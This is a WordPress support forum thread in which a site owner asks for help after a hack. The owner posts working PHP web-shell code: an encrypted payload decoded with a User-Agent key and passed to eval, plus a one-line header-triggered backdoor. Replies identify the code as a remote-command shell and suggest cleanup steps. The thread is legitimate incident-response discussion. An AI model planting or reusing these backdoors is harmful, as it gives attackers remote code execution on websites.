WordPress infected/hacked

  • Our wordpress site was infected or hacked with some kind of malicious code.

    This is what I got. Do you know what kind of virus is it and how to clean the site? Thanks!

    <?php

/*
    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
    */

$file = FILE ;

$str = file_get_contents($file);

if(preg_match('#/*(.*?)*/#si', $str, $match))
    $string = trim($match[1]);
    else
    exit;

$key = $_SERVER['HTTP_USER_AGENT'];
    $key = md5($key);
    $key_length = strlen( $key );
    $string = base64_decode($string);
    $string_length=strlen($string);
    $rndkey=$box=array();
    $result='';
    for($i=0;$i<=800;$i++){
    $box[$i]=ord($key[$i%$key_length]);
    }

for($a=$j=$i=0;$i<$string_length;$i++){
    $result.=chr(ord($string[$i])^($box[$i%256]));
    }

if(substr($result,0,8)==substr(md5(substr($result,8).$key),0,8)){
    $result = substr($result,8);
    eval($result);
    }

    The page I need help with: [log in to see the link]

Viewing 7 replies - 1 through 7 (of 7 total)

  • Is this in your index.php file ? If yes, re installing WordPress core files should fix it. Other than this, look for unwanted files and folders under your accounts. If you do not need them, please download and remove them. Let us know the outcome.

    Note: Please make sure you backup the data.

    • This reply was modified 1 year, 4 months ago by Yui.
    • This reply was modified 1 year, 4 months ago by milesweb.
    Moderator Yui

    (@fierevere)

    永子

    Its a generic web shell used to execute remote commands.

    There should be other vulnerability somewhere, which allowed remote attacker to install this shell and possibly otherwise to infest your site with other kind of malware.

    You can start with this article
    https://www.ads-software.com/documentation/article/faq-my-site-was-hacked/

    Thread Starter Adrian Ghio

    (@aghio)

    @fierevere, @milesweb thanks both for this info. I will check those links to see what else can we do with this.

    till now, it looks clean….
    Thanks again.

    Thread Starter Adrian Ghio

    (@aghio)

    Here, more info…

    It looks like we were infected with “Trojan.PHP.Agent.gen.532”

    Thread Starter Adrian Ghio

    (@aghio)

    Now, more details…. I saw this in several php files:

    $_HEADERS=getallheaders();if(isset($_HEADERS[‘If-Modified-Since’])){$dbx_convert=$_HEADERS[‘If-Modified-Since’](”, $_HEADERS‘Sec-Websocket-Accept’);$dbx_convert();}

    Does someone knows what kind of troyan or malicious code is this?

    I really can′t stop him….

    Thread Starter Adrian Ghio

    (@aghio)

    And this….

    return array(‘dependencies’ => array(‘react’, ‘wc-price-format’, ‘wc-settings’, ‘wp-block-editor’, ‘wp-blocks’, ‘wp-components’, ‘wp-data’, ‘wp-dom’, ‘wp-element’, ‘wp-i18n’, ‘wp-polyfill’, ‘wp-primitives’), ‘version’ => ‘aabdcaf2b8c977161222a8b795694ea1’);

    You should try using Malcare OR Sucuri and clean the files if they are infected. Other option is to consider using a WAF protection OR real time scanning option which would clean and quarantine the files automatically.

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘WordPress infected/hacked’ is closed to new replies.

Tags